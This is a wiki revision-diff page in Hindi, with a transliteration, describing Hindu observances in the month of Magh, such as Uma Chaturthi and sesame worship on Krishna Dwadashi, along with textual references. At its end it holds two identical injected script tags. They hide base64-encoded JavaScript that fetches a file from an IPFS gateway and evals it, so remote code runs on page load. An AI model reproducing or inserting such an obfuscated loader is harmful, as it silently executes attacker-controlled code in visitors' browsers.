Difference between revisions of "माघ कृत्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*माघ में कई महत्त्वपूर्ण व्रत होते हैं।<ref>कृत्यरत्नाकर (487-514)</ref>; व<ref>र्षक्रियाकौमुदी (490-514)</ref>; <ref>निर्णयसिन्धु (213-221)</ref>; <ref>स्मृतिकौस्तुभ (439-513)</ref>; <ref>गदाधरपद्धति (कालसार, 37-41)</ref>, यथा–[[तिल चतुर्थी]], [[रथ सप्तमी]], [[भीष्माष्टमी]]  
 
*माघ में कई महत्त्वपूर्ण व्रत होते हैं।<ref>कृत्यरत्नाकर (487-514)</ref>; व<ref>र्षक्रियाकौमुदी (490-514)</ref>; <ref>निर्णयसिन्धु (213-221)</ref>; <ref>स्मृतिकौस्तुभ (439-513)</ref>; <ref>गदाधरपद्धति (कालसार, 37-41)</ref>, यथा–[[तिल चतुर्थी]], [[रथ सप्तमी]], [[भीष्माष्टमी]]  
*[[माघ]] [[शुक्ल पक्षा|शुक्ल]] [[चतुर्थी]] को 'उमा चतुर्थी' कहते हैं, क्योंकि लोगों (विशेष रूप से नारियों) द्वारा कुन्द एवं अन्य पुष्पों से, गुड़ अर्पण, नमक, यवक से गौरी पूजा की जाती है।
+
*[[माघ]] [[शुक्ल पक्ष|शुक्ल]] [[चतुर्थी]] को 'उमा चतुर्थी' कहते हैं, क्योंकि लोगों (विशेष रूप से नारियों) द्वारा कुन्द एवं अन्य पुष्पों से, गुड़ अर्पण, नमक, यवक से गौरी पूजा की जाती है।
 
*सधवा नारियों, ब्राह्मणों एवं का सम्मान किया जाता है।<ref>कृत्यकल्पतरु (नैयतकालिक काण्ड, 437-438)</ref>; <ref>कृत्यरत्नाकर (503)</ref>
 
*सधवा नारियों, ब्राह्मणों एवं का सम्मान किया जाता है।<ref>कृत्यकल्पतरु (नैयतकालिक काण्ड, 437-438)</ref>; <ref>कृत्यरत्नाकर (503)</ref>
*माघ [[कृश्ण पक्षा|कृष्ण]] [[द्वादशी]] को यम ने तिल उत्पन्न किया।
+
*माघ [[कृष्ण पक्ष|कृष्ण]] [[द्वादशी]] को यम ने तिल उत्पन्न किया।
 
*[[दशरथ]] उसे पृथ्वी पर ले आये और बो दिया, [[विष्णु]] को देवों ने तिल का स्वामी बनाया, अतः उस दिन उपवास कर तिल से हरि पूजा करनी चाहिए, तिल से होम करना चाहिए, तिल दान करना चाहिए और उसे खाना चाहिए।<ref>[[विष्णु धर्मसूत्र]] (90|19)</ref>; <ref>कृत्यकल्पतरु (नैयतकालिक काण्ड 435-436)</ref>; <ref>कृत्यरत्नाकर (495-496)</ref>  
 
*[[दशरथ]] उसे पृथ्वी पर ले आये और बो दिया, [[विष्णु]] को देवों ने तिल का स्वामी बनाया, अतः उस दिन उपवास कर तिल से हरि पूजा करनी चाहिए, तिल से होम करना चाहिए, तिल दान करना चाहिए और उसे खाना चाहिए।<ref>[[विष्णु धर्मसूत्र]] (90|19)</ref>; <ref>कृत्यकल्पतरु (नैयतकालिक काण्ड 435-436)</ref>; <ref>कृत्यरत्नाकर (495-496)</ref>  
 
*माघ [[अमावास्या]] पर जबकि वह [[सोमवार]] को प्रातःकाल उपस्थित हो, लोगों को (विशेष रूप से नारियों को) 'अश्वत्थ वृक्ष' की परिक्रमा करनी चाहिए और दान देना चाहिए।  
 
*माघ [[अमावास्या]] पर जबकि वह [[सोमवार]] को प्रातःकाल उपस्थित हो, लोगों को (विशेष रूप से नारियों को) 'अश्वत्थ वृक्ष' की परिक्रमा करनी चाहिए और दान देना चाहिए।  

Revision as of 07:57, 3 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • magh mean kee mahattvapoorn vrat hote haian.[1]; v[2]; [3]; [4]; [5], yatha–til chaturthi, rath saptami, bhishmashtami
  • magh shukl chaturthi ko 'uma chaturthi' kahate haian, kyoanki logoan (vishesh roop se nariyoan) dvara kund evan any pushpoan se, gu d arpan, namak, yavak se gauri pooja ki jati hai.
  • sadhava nariyoan, brahmanoan evan ka samman kiya jata hai.[6]; [7]
  • magh krishna dvadashi ko yam ne til utpann kiya.
  • dasharath use prithvi par le aye aur bo diya, vishnu ko devoan ne til ka svami banaya, atah us din upavas kar til se hari pooja karani chahie, til se hom karana chahie, til dan karana chahie aur use khana chahie.[8]; [9]; [10]
  • magh amavasya par jabaki vah somavar ko pratahkal upasthit ho, logoan ko (vishesh roop se nariyoan ko) 'ashvatth vriksh' ki parikrama karani chahie aur dan dena chahie.
  • yah krity tamil desh mean prachalit hai.


tika tippani aur sandarbh

  1. krityaratnakar (487-514)
  2. rshakriyakaumudi (490-514)
  3. nirnayasindhu (213-221)
  4. smritikaustubh (439-513)
  5. gadadharapaddhati (kalasar, 37-41)
  6. krityakalpataru (naiyatakalik kand, 437-438)
  7. krityaratnakar (503)
  8. vishnu dharmasootr (90|19)
  9. krityakalpataru (naiyatakalik kand 435-436)
  10. krityaratnakar (495-496)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>